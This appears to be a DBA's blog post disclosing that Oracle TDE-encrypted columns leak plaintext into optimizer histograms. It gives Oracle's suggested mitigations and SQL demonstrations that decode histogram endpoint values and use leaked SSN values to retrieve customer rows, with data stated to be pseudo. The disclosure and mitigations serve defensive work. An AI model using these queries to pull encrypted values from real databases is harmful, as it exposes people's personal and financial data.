While at #KSCOPE15, I was asked about encrypted data showing up in histograms. So, I ran a few experiments and learned that encrypted data does indeed leak. I contacted Oracle through an old friend to get their input.
Here is the reply I received.
The attack vector here is via SELECT on histogram tables. The protection profile for TDE by design does not address DB users with proper access to such tables. The gotcha here is that many people don’t realize they should control access to STATS tables as well as the tables with sensitive data.
1. Configure Database Vault policy so user who tries to query sensitive columns on these views/tables is denied access
2. Do not collect stats on sensitive columns in the first place
1 Test 1) Note, we are putting this into a non-encrypted tablespace, we are going to explicitly encrypt column D1.
2
3 --CREATE A TEST TABLE
4 RLOCKARD@pdev > CREATE TABLE t1 (id NUMBER GENERATED AS IDENTITY, d1 VARCHAR2(255)) TABLESPACE not_sensitive;
5 Table created.
6
7 -- ENCRYPT THE DATA
8 RLOCKARD@pdev > alter table t1 modify (d1 encrypt using 'AES256');
9 Table altered.
10
11 --INSERT SOME TEST DATA
12 RLOCKARD@pdev > insert into t1 (D1) (select 'Encrypt your data' from dual connect by level <= 10);
13 10 rows created.
14 RLOCKARD@pdev > insert into t1 (D1) (select 'Is this encrypted?' from dual connect by level <= 5);
15 5 rows created.
16 RLOCKARD@pdev > insert into t1 (D1) (select 'Practice Secure Computing' from dual connect by level <= 20);
17 20 rows created.
18 RLOCKARD@pdev > commit;
19 Commit complete.
20
21 -- GATHER STATISTICS ALONG WITH HISTOGRAMS.
22 RLOCKARD@pdev > begin
23 dbms_stats.gather_table_stats(null,'T1', method_opt=> 'for all columns size skewonly');
24 end;
25 /
26 PL/SQL procedure successfully completed.
27 -- THIS LOOKS GOOD
28 RLOCKARD@pdev > select
29 endpoint_number,
30 endpoint_actual_value
31 from dba_tab_histograms
32 where owner = 'RLOCKARD'
33 and table_name = 'T1'
34 and column_name = 'D1';
35 2 3 4 5 6 7
36 ENDPOINT_NUMBER ENDPOINT_ACTUAL_VALUE
37 --------------- --------------------------------
38 10
39 15
40 35
41
42 -- HOWEVER, WHEN WE DIG A BIT FURTHER IT'S QUITE EASY TO
43 -- TRANSLATE ENDPOINT_VALUE INTO THE FIRST CHARACTERS OF THE
44 -- DATA THEREBY EXPOSING THE INFORMATION.
45 -- NOTE THIS QUERY IS FROM Jonathan Lewis blog at: https://jonathanlewis.wordpress.com/category/oracle/statistics/histograms/
46
47
48 RLOCKARD@pdev > ed
49 Wrote file afiedt.buf
50
51 1 select
52 2 endpoint_number,
53 3 endpoint_number - nvl(prev_endpoint,0) frequency,
54 4 hex_val,
55 5 chr(to_number(substr(hex_val, 2,2),'XX')) ||
56 6 chr(to_number(substr(hex_val, 4,2),'XX')) ||
57 7 chr(to_number(substr(hex_val, 6,2),'XX')) ||
58 8 chr(to_number(substr(hex_val, 8,2),'XX')) ||
59 9 chr(to_number(substr(hex_val,10,2),'XX')) ||
60 10 chr(to_number(substr(hex_val,12,2),'XX')) ||
61 11 chr(to_number(substr(hex_val,14,2),'XX')) ||
62 12 chr(to_number(substr(hex_val,16,2),'XX')),
63 13 endpoint_actual_value
64 14 from (
65 15 select
66 16 endpoint_number,
67 17 lag(endpoint_number,1) over(
68 18 order by endpoint_number
69 19 ) prev_endpoint,
70 20 to_char(endpoint_value,'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')hex_val,
71 21 endpoint_actual_value
72 22 from
73 23 dba_tab_histograms
74 24 WHERE
75 25 owner = 'RLOCKARD'
76 26 AND table_name = 'T1'
77 27 and column_name = 'D1'
78 28 )
79 29 order by
80 30* endpoint_number
81 31 /
82
83 ENDPOINT_NUMBER FREQUENCY HEX_VAL CHR(TO_N ENDPOINT_ACTUAL_VALUE
84 --------------- ------------ ------------------------------- -------- --------------------------------
85 10 10 456E6372797079E93CBEA1A5000000 Encrypye
86 15 5 49732074686967A04440BE12C00000 Is thig
87 35 20 5072616374698217A0D44499800000 Practi?
88
89 3 rows selected.
90
91
92
93
94 TEST 2)
95 Important note: THIS IS ALL PSEUDO DATA, NOTING IS REAL.
96
97 -- the test customers table contains pseudo ssn's and cc numbers for demo purposes.
98 -- reality is, because cc_nbr and ssn are distinct, histograms should not be gathered,
99 -- however a "lazy" DBA may use the 'for all columns size skewonly' method_opt
100 -- therefore, by using the defaults you will get out 254 rows with data that should be encrypted.
101
102 create table t3 as select id, fname, lname, city, state, cc_nbr, ssn from customers;
103 alter table t3 modify (cc_nbr encrypt using 'AES256', SSN encrypt using 'AES256');
104
105 begin
106 dbms_stats.gather_table_stats(null,'T3', method_opt=> 'for all columns size skewonly');
107 end;
108 /
109
110 desc t3
111
112 RLOCKARD@pdev > desc t3
113 Name Null? Type
114 ------------------------------------------------------------------------ -------- -------------------------------------------------
115 ID NOT NULL NUMBER
116 FNAME VARCHAR2(25)
117 LNAME VARCHAR2(25)
118 CITY VARCHAR2(25)
119 STATE VARCHAR2(25)
120 CC_NBR VARCHAR2(16) ENCRYPT
121 SSN VARCHAR2(11) ENCRYPT
122
123 RLOCKARD@pdev >
124
125
126 select
127 endpoint_number,
128 endpoint_actual_value
129 from dba_tab_histograms
130 where owner = 'RLOCKARD'
131 and table_name = 'T3'
132 and column_name = 'SSN';
133
134 RLOCKARD@pdev > l
135 1 select
136 2 endpoint_number,
137 3 endpoint_actual_value
138 4 from dba_tab_histograms
139 5 where owner = 'RLOCKARD'
140 6 and table_name = 'T3'
141 7* and column_name = 'SSN'
142 RLOCKARD@pdev > /
143
144 ENDPOINT_NUMBER ENDPOINT_ACTUAL_VALUE
145 --------------- --------------------------------
146 4247 778294598
147 4269 782777484
148 4291 785731383
149 4313 788768328
150 4335 792928354
151 4357 795685465
152 4379 798987731
153 4401 812732627
154 4424 815857391
155 4446 818188243
156 ========SNIP A LOT======
157
158 RLOCKARD@pdev > SELECT * FROM T3 WHERE SSN='778294598';
159
160 ID FNAME LNAME CITY STATE CC_NBR
161 ---------- ------------------------- ------------------------- ------------------------- ------------------------- ----------------
162 SSN
163 -----------
164 41742 Monica Gaestel Strattanville Pennsylvania 3483712444144721
165 778294598
166
167
168 1 row selected.